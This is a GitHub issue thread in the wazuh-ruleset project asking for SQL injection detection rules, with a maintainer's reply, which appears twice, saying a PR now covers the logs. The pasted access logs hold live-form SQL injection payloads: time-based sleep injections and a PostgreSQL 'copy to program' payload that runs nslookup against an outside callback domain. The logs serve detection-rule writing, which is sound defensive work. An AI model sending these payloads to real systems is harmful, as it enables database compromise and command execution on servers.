### ISSUE TITLE
nslookup and other sql injections are not in web attack rules (add more regex`s to <url>).

### ISSUE THREAD

**Issue by macktab** [wazuh/wazuh-ruleset#342]
Can we add new url`s for sql_injection rules (to ruleset/rules/0245-web_rules.xml) ?

`www.example.com:80 1.1.1.1 - - [12/Mar/2019:10:09:12 +0000] "GET /example?dir=asc&order=Mcd6Pr9F';select%20pg_sleep(9.703);%20--%20&example=5101 HTTP/1.1" 200 10345 "https://www.example.com" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21" "-" "XIeFSOin2ac7y0KragEaGwAAAAM"`

`www.example.com:80 1.1.1.1 - - [12/Mar/2019:10:09:09 +0000] "GET /example?dir=asc&order=if(now()=sysdate()%2csleep(19.406)%2c0)/*'XOR(if(now()=sysdate()%2csleep(19.406)%2c0))OR'\"XOR(if(now()=sysdate()%2csleep(19.406)%2c0))OR\"*/&example=5101 HTTP/1.1" 200 10869 "https://www.example.com" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21" "-" "XIeFRRmu6BzGhDFQJ1K@HwAAAAs"`

`www.example.com:80 1.1.1.1 - - [12/Mar/2019:10:08:43 +0000] "GET /example/result/?frame=15&price=2000-999999&q=1;copy%20(select%20'')%20to%20program%20'nslookup%20dns.sqli.%5c027837.40-4956.40.fd71c.%5c1.bxss.me' HTTP/1.1" 302 6607 "https://www.example.com" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21" "-" "XIeFK3HSTP7l6freHq0-NgAAAAc"`

**Comment by Lopuiz** [comment]
Hi @macktab 
Thank you for your feedback. I have opened [PR](https://github.com/wazuh/wazuh-ruleset/pull/344) with new rules that match your logs.
For now we are not planning to go deeper into sql-injection rules but if you have new logs that you want to be matched, let us know and we'll add rules.
Best regards, Eva.

**Comment by Lopuiz** [comment]
Hi @macktab
Thank you for your feedback. I have opened PR with new rules that match your logs.
For now, we are not planning to go deeper into sql-injection rules but if you have new logs that you want to be matched, let us know and we'll add rules.
Best regards, Eva.

**Comment by macktab** [comment]
Thank you.
